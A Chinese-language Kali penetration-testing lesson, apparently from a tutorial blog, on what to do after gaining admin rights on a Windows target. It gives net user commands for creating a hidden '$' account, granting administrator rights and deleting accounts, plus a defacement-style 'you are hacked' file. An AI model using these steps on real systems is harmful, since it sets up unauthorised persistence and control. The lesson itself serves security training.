一、课前准备
使用kali工具***Windows目标计算机并获取目标计算机的管理员权限。
二、课程目标
1.通过学习本课程,了解获取Windows目标计算机管理权限后,可以对其进行若干的操作。
2.通过学习本课程,达到充分利用kali工具所获取信息提高后续***测试效率的目标。
三、课程内容
1.远程查看目标计算机的系统信息。
命令:C:\Windows\system32>systeminfo 回车
命令行结果显示界面:(因不支持中文编译,故界面出现乱码,在CMD中输入chcp65001)
2.在目标计算机中远程创建隐藏账户。
命令:C:\Windows\system32>net user 用户名$ 密码 /add 回车
例子:C:\Windows\system32>net user admin$ 123456 /add
命令行结果显示界面:
附加知识:①加$,创建账户为隐藏账户;不加$,创建账户为普通账户。(通过加$符号创建的隐藏账户只是无法通过 net user 命令查看,但仍能通过图形界面查看。如需创建真正隐藏账户,需要进行注册表相关操作,后续课程将为大家详细介绍。)
②在目标计算机中查看通过加$符号创建的隐藏账户。
查看步骤:目标计算机->控制面板->用户账户和家庭安全->用户账户->管理账户
3.远程删除目标计算机中已存在的账号。
命令:C:\Windows\system32>net user 用户名 /del 回车
例子:C:\Windows\system32>net user admin /del
命令行结果显示界面:
4.远程将管理员身份赋予目标计算机中的普通用户。
命令:C:\Windows\system32>net localgroup administrators admin /add 回车
命令行结果显示界面:
5.远程查看目标计算机中的用户是否为管理员身份。
命令:C:\Windows\system32>net localgroup administrators 回车
命令行结果显示界面:
6.远程切换目标计算机的操作路径。
命令:C:\Windows\system32>cd .. 回车
命令行结果显示界面:
7.远程查看目标计算机的目录。
命令:C:\Windows >dir 回车
8.在目标计算机中新建目录。
命令:C:\Windows >md 目录名 回车
例子:C:\Windows >md abc
命令行结果显示界面:
9.删除目标计算机中已存在的目录。
命令:C:\Windows >rd 目录名 回车
例子:C:\Windows >rd abc
命令行结果显示界面:
10.在目标计算机中任意目录下创建并编辑文件。
命令:C:\Windows >echo 文件内容 >文件名 回车
例子:在目标计算机的桌面创建并推送文件。
①进入到桌面路径。
命令:C:\>cd users
C:\Users>cd Administrator.WIN-IVTN50G0GEH
C:\Users\Administrator.WIN-IVTN50G0GEH>cd desktop
②创建并编辑文件
命令:C:\Users\Administrator.WIN-IVTN50G0GEH\desktop> echo hi you are hacked >hk.txt
命令行结果显示界面:
结果查看:
Ps:windows计算机控制台命令都可以在kali中正常使用。
到此学习完毕,谢谢观看,获取更多干货请持续关注本号!
辛苦原创,各位看官记得好评加关注哦!你也可搜索:Kali与编程,学习更多Kali Linux***与白帽编程技巧哦!